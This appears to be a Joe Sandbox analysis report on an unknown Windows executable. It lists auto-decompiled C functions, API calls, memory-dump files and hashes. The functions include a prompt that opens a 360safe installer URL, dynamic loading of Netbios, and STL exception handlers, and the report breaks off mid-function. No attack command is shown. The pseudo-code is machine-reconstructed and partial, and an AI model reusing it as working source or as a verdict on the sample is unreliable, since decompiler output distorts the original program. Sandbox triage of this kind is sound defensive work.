                                                                                                                                                                                          0x00c9d428
                                                                                                                                                                                          0x00c9d42e
                                                                                                                                                                                          0x00c9d437
                                                                                                                                                                                          0x00c9d446

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9D3E0
                                                                                                                                                                                            • Part of subcall function 00C9D274: __EH_prolog3_GS.LIBCMT ref: 00C9D27E
                                                                                                                                                                                            • Part of subcall function 00C9D274: _memset.LIBCMT ref: 00C9D2E3
                                                                                                                                                                                            • Part of subcall function 00C9D274: GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 00C9D2FA
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DecrementH_prolog3H_prolog3_InterlockedLongNamePath_memset
                                                                                                                                                                                          • String ID: %s\%s$themes
                                                                                                                                                                                          • API String ID: 229493911-1248126942
                                                                                                                                                                                          • Opcode ID: ee6a7f13cc3fa80ccb0410da55a167cdd07565bf8b495378ae82d41c6ec4b530
                                                                                                                                                                                          • Instruction ID: 9dc2b4c9462f340e8d6258f25e89129241dd1f9b1b9f473f57eefe44aee0b433
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee6a7f13cc3fa80ccb0410da55a167cdd07565bf8b495378ae82d41c6ec4b530
                                                                                                                                                                                          • Instruction Fuzzy Hash: F4013C75940208DFCF10EF64CC85AAEBBB4EF58311F50895AE55ABB242D731AA05EB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9BBB5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                          			E00C9BBB5(intOrPtr __edx, intOrPtr __edi) {
				void* __esi;
				WCHAR* _t10;
				WCHAR* _t12;
				int _t14;
				intOrPtr _t21;
				intOrPtr _t29;
				intOrPtr _t30;
				struct HWND__* _t31;
				intOrPtr _t32;
				signed int _t33;

				_t30 = __edi;
				_t29 = __edx;
				_t10 =  *0xd5d01c; // 0xd5d014
				 *(_t33 - 0x58) = _t10;
				E00C9ACCC(_t33 - 0x58, 0xd3b000);
				_t12 =  *0xd5d01c; // 0xd5d014
				_t23 = _t33 - 0x5c;
				 *(_t33 - 0x5c) = _t12;
				E00C9ACCC(_t33 - 0x5c, "360");
				_t14 = MessageBoxW(_t31,  *(_t33 - 0x58),  *(_t33 - 0x5c), 0x41);
				_t37 = _t14 - 1;
				if(_t14 == 1) {
					E00CC6971(_t23, _t29, _t37, L"http://down.360safe.com/safesetup_2000.exe");
				}
				E00C9820F(_t33 - 0x5c);
				E00C9820F(_t33 - 0x58);
				_pop(_t32);
				_pop(_t21);
				return E00D0071A(1, _t21,  *(_t33 + 0x1b4) ^ _t33, _t29, _t30, _t32);
			}













                                                                                                                                                                                          0x00c9bbb5
                                                                                                                                                                                          0x00c9bbb5
                                                                                                                                                                                          0x00c9bbb5
                                                                                                                                                                                          0x00c9bbc2
                                                                                                                                                                                          0x00c9bbc5
                                                                                                                                                                                          0x00c9bbca
                                                                                                                                                                                          0x00c9bbd4
                                                                                                                                                                                          0x00c9bbd7
                                                                                                                                                                                          0x00c9bbda
                                                                                                                                                                                          0x00c9bbe8
                                                                                                                                                                                          0x00c9bbee
                                                                                                                                                                                          0x00c9bbf1
                                                                                                                                                                                          0x00c9bbf8
                                                                                                                                                                                          0x00c9bbfd
                                                                                                                                                                                          0x00c9bc01
                                                                                                                                                                                          0x00c9bc09
                                                                                                                                                                                          0x00c9c0f0
                                                                                                                                                                                          0x00c9c0f3
                                                                                                                                                                                          0x00c9c100

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C9ACCC: lstrlenW.KERNEL32(?), ref: 00C9ACDD
                                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,00000041), ref: 00C9BBE8
                                                                                                                                                                                            • Part of subcall function 00CC6971: _memset.LIBCMT ref: 00CC69CB
                                                                                                                                                                                            • Part of subcall function 00CC6971: ShellExecuteW.SHELL32(00000000,open,Explorer,?,00000000,00000005), ref: 00CC69FF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteMessageShell_memsetlstrlen
                                                                                                                                                                                          • String ID: 360$http://down.360safe.com/safesetup_2000.exe
                                                                                                                                                                                          • API String ID: 868717829-471990289
                                                                                                                                                                                          • Opcode ID: d3778fcdf695c2cb818990c847de74af4166d361dbbe2390b78ae445e1a93842
                                                                                                                                                                                          • Instruction ID: 0c208323dda262f2a3af94e304398ab24c20b002dca1a0238337731e0918d94c
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3778fcdf695c2cb818990c847de74af4166d361dbbe2390b78ae445e1a93842
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F04932A40248ABCF14FFE4DD9ADECBB71AB15310F004809F012EA2D9DF35954AEB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C97EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C97EC3(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HICON__* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				struct HICON__* _t24;

				E00D006A0(__edi,  &_v48, 0, 0x2c);
				_v48 = _a12;
				_v44 = DefWindowProcW;
				_v32 = _a4;
				_v52 = 0x30;
				_v28 = _a16;
				_t24 = LoadCursorW(0, 0x7f00);
				_t10 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_v24 = _t24;
				_v12 = _a8;
				_v20 = 6;
				_v40 = 0x1e;
				return E00C972CA( *_t10,  &_v52);
			}














                                                                                                                                                                                          0x00c97ed1
                                                                                                                                                                                          0x00c97ed9
                                                                                                                                                                                          0x00c97ee1
                                                                                                                                                                                          0x00c97eea
                                                                                                                                                                                          0x00c97ef7
                                                                                                                                                                                          0x00c97efe
                                                                                                                                                                                          0x00c97f01
                                                                                                                                                                                          0x00c97f07
                                                                                                                                                                                          0x00c97f07
                                                                                                                                                                                          0x00c97f0b
                                                                                                                                                                                          0x00c97f11
                                                                                                                                                                                          0x00c97f18
                                                                                                                                                                                          0x00c97f1f
                                                                                                                                                                                          0x00c97f2d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C97ED1
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00C97F01
                                                                                                                                                                                            • Part of subcall function 00C972CA: _memset.LIBCMT ref: 00C972DB
                                                                                                                                                                                            • Part of subcall function 00C972CA: GetClassInfoExW.USER32 ref: 00C972F3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$ClassCursorInfoLoad
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 3268340168-4108050209
                                                                                                                                                                                          • Opcode ID: f44ebfbed7be036d30907183130d25195f30026a71141fe6927660df3601f011
                                                                                                                                                                                          • Instruction ID: c3d04c6acf22c717a217a30fd0dd158d21f5c6e003d8d5d9f9d1f1318a64b185
                                                                                                                                                                                          • Opcode Fuzzy Hash: f44ebfbed7be036d30907183130d25195f30026a71141fe6927660df3601f011
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3016671D10309AFDB00DFA8D946BDEBBF4BB08314F104425E914EB281E7B5A6548FA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFE000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00CFE000(intOrPtr _a4) {
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_t2 =  *0xd67c88; // 0x0
				if(_t2 != 0) {
					L6:
					return  *_t2(_a4);
				} else {
					_t4 = E00CFDEE0(_t8, _t9, _t10, L"Netapi32.dll");
					if(_t4 == 0) {
						L4:
						_t2 =  *0xd67c88; // 0x0
					} else {
						_t2 = GetProcAddress(_t4, "Netbios");
						if(_t2 == 0) {
							goto L4;
						} else {
							 *0xd67c88 = _t2;
						}
					}
					if(_t2 == 0) {
						return 0x40;
					} else {
						goto L6;
					}
				}
			}








                                                                                                                                                                                          0x00cfe000
                                                                                                                                                                                          0x00cfe00a
                                                                                                                                                                                          0x00cfe03d
                                                                                                                                                                                          0x00cfe045
                                                                                                                                                                                          0x00cfe00c
                                                                                                                                                                                          0x00cfe011
                                                                                                                                                                                          0x00cfe01b
                                                                                                                                                                                          0x00cfe034
                                                                                                                                                                                          0x00cfe034
                                                                                                                                                                                          0x00cfe01d
                                                                                                                                                                                          0x00cfe023
                                                                                                                                                                                          0x00cfe02b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe02d
                                                                                                                                                                                          0x00cfe02d
                                                                                                                                                                                          0x00cfe02d
                                                                                                                                                                                          0x00cfe02b
                                                                                                                                                                                          0x00cfe03b
                                                                                                                                                                                          0x00cfe049
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cfe03b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Netbios), ref: 00CFE023
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                          • String ID: Netapi32.dll$Netbios
                                                                                                                                                                                          • API String ID: 190572456-3142203730
                                                                                                                                                                                          • Opcode ID: d40505c61c4f1e5c21f60c8c595a4b02e2d0c1caf19d1481211b3fc25f2e67d9
                                                                                                                                                                                          • Instruction ID: 89925861bd9622831aafe223825e3daf306864f8896b85c87682b9130962f58a
                                                                                                                                                                                          • Opcode Fuzzy Hash: d40505c61c4f1e5c21f60c8c595a4b02e2d0c1caf19d1481211b3fc25f2e67d9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 99E01AA17453099F9A609BA5ACC1EBA27D86B503C97690025F615C6260EEA2C944F633
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CAF11D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E00CAF11D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t13;
				void* _t21;
				intOrPtr _t23;
				void* _t28;

				_t21 = __ecx;
				_push(0x44);
				E00D0155A(0xd31a83, __ebx, __edi, __esi);
				_t13 =  *((intOrPtr*)(__ecx + 0x18));
				_t23 =  *((intOrPtr*)(_t28 + 8));
				if(0x3fffffff - _t13 < _t23) {
					E00C8B780(_t28 - 0x28, "list<T> too long");
					_t4 = _t28 - 4;
					 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
					_t21 = _t28 - 0x50;
					E00C8A510( *_t4, _t28 - 0x28);
					 *((intOrPtr*)(_t28 - 0x50)) = 0xd3e0e0;
					_t13 = E00D00729(_t28 - 0x50, 0xd59808);
				}
				_t14 = _t13 + _t23;
				 *((intOrPtr*)(_t21 + 0x18)) = _t13 + _t23;
				return E00D01632(_t14);
			}







                                                                                                                                                                                          0x00caf11d
                                                                                                                                                                                          0x00caf11d
                                                                                                                                                                                          0x00caf124
                                                                                                                                                                                          0x00caf129
                                                                                                                                                                                          0x00caf12c
                                                                                                                                                                                          0x00caf138
                                                                                                                                                                                          0x00caf142
                                                                                                                                                                                          0x00caf147
                                                                                                                                                                                          0x00caf147
                                                                                                                                                                                          0x00caf14f
                                                                                                                                                                                          0x00caf152
                                                                                                                                                                                          0x00caf160
                                                                                                                                                                                          0x00caf167
                                                                                                                                                                                          0x00caf167
                                                                                                                                                                                          0x00caf16c
                                                                                                                                                                                          0x00caf16e
                                                                                                                                                                                          0x00caf176

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CAF124
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00CAF167
                                                                                                                                                                                            • Part of subcall function 00D00729: RaiseException.KERNEL32(?,?,?,00C880B1,?,?,?,?,?,00C880B1,00D59760,00D59760), ref: 00D0076B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                                                                          • String ID: list<T> too long
                                                                                                                                                                                          • API String ID: 1961742612-4027344264
                                                                                                                                                                                          • Opcode ID: 8092ec2d83377263b28671ba609333bea3badbb712be0a214490ccf58e623516
                                                                                                                                                                                          • Instruction ID: ef86b22e9f26603f9d805fb7e7df42a6f260d50a2818b3856b9c84f215f5400c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8092ec2d83377263b28671ba609333bea3badbb712be0a214490ccf58e623516
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F082769002149FCB04FBE4C852BCD7774EF64315F144624E509A72C1E7B1D946C7B4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CAF2B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00CAF2B9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t21;
				void* _t26;

				_push(0x44);
				E00D0155A(0xd31ac9, __ebx, __edi, __esi);
				E00C8B780(_t26 - 0x28, "vector<T> too long");
				_t2 = _t26 - 4;
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				E00C8A510( *_t2, _t26 - 0x28);
				 *((intOrPtr*)(_t26 - 0x50)) = 0xd3e0e0;
				E00D00729(_t26 - 0x50, 0xd59808);
				asm("int3");
				_push(__esi);
				E00CAF106(__ebx, _t26 - 0x50, _t21, __edi,  *_t2);
				return E00D0068E(__ebx, _t21, __edi, _t26 - 0x50,  *_t2,  *((intOrPtr*)(_t26 - 0x50)));
			}





                                                                                                                                                                                          0x00caf2b9
                                                                                                                                                                                          0x00caf2c0
                                                                                                                                                                                          0x00caf2cd
                                                                                                                                                                                          0x00caf2d2
                                                                                                                                                                                          0x00caf2d2
                                                                                                                                                                                          0x00caf2dd
                                                                                                                                                                                          0x00caf2eb
                                                                                                                                                                                          0x00caf2f2
                                                                                                                                                                                          0x00caf2f7
                                                                                                                                                                                          0x00caf2f8
                                                                                                                                                                                          0x00caf2fb
                                                                                                                                                                                          0x00caf309

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CAF2C0
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00CAF2F2
                                                                                                                                                                                            • Part of subcall function 00D00729: RaiseException.KERNEL32(?,?,?,00C880B1,?,?,?,?,?,00C880B1,00D59760,00D59760), ref: 00D0076B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                                                                          • String ID: vector<T> too long
                                                                                                                                                                                          • API String ID: 1961742612-3788999226
                                                                                                                                                                                          • Opcode ID: b68e8bdb8a40381f9c231a03da0547e009092f936d573fb5bfe09fcbeaa3c03e
                                                                                                                                                                                          • Instruction ID: af310a2919a428d0c2f5214b01db3aa3b4bb209b3e1255c1b22659d2dd0c6a6a
                                                                                                                                                                                          • Opcode Fuzzy Hash: b68e8bdb8a40381f9c231a03da0547e009092f936d573fb5bfe09fcbeaa3c03e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E06D31810118AADB04FBD0D802BCC77B8EF44311F040929F205A6086DBB65A489774
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8E810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 58%
                                                                                                                                                                                          			E00C8E810() {
				signed int _t1;
				void* _t4;

				_t1 = E00D06060(_t4, L"http://down.360safe.com/setup.exe", L"http://down.360safe.com/setup.exe", 0xc8);
				asm("sbb eax, eax");
				return  ~_t1 + 1;
			}





                                                                                                                                                                                          0x00c8e81f
                                                                                                                                                                                          0x00c8e829
                                                                                                                                                                                          0x00c8e82c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • http://down.360safe.com/setup.exe, xrefs: 00C8E81A
                                                                                                                                                                                          • http://down.360safe.com/setup.exe, xrefs: 00C8E815
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __wcsnicmp
                                                                                                                                                                                          • String ID: http://down.360safe.com/setup.exe$http://down.360safe.com/setup.exe
                                                                                                                                                                                          • API String ID: 1038674560-3947027562
                                                                                                                                                                                          • Opcode ID: 5f3c3d21bb12ae6daeb6d51b91586bb5cd51c83a1749a451715933d2880d211b
                                                                                                                                                                                          • Instruction ID: f8c649b9c92b7e660a9df57079638351cadf35fa17dfec65d499925b29b909a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f3c3d21bb12ae6daeb6d51b91586bb5cd51c83a1749a451715933d2880d211b
                                                                                                                                                                                          • Instruction Fuzzy Hash: B6B01251FF174866D81031343C03F1400804362F06F0402307907D10C5EC80501D2075
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CB1602 Relevance: 5.2, APIs: 4, Instructions: 161stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                          			E00CB1602(WCHAR** __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				WCHAR** _v28;
				WCHAR* _v32;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t78;
				WCHAR* _t81;
				signed int _t83;
				intOrPtr _t86;
				signed int _t88;
				WCHAR* _t96;
				void* _t117;
				intOrPtr _t121;
				void* _t122;
				signed int _t133;
				void* _t139;
				WCHAR* _t140;
				WCHAR** _t141;
				signed int _t142;
				WCHAR* _t144;
				WCHAR* _t145;
				WCHAR* _t146;
				void* _t148;
				void* _t149;

				_t139 = __edx;
				_t141 = __ecx;
				_v28 = __ecx;
				if(_a4 == 0) {
					L2:
					return 0;
				}
				_t117 = lstrlenW;
				_t78 = lstrlenW(_a4);
				_v12 = _t78;
				if(_t78 != 0) {
					__eflags = _a8;
					if(_a8 != 0) {
						_v8 = lstrlenW(_a8);
					} else {
						_v8 = 0;
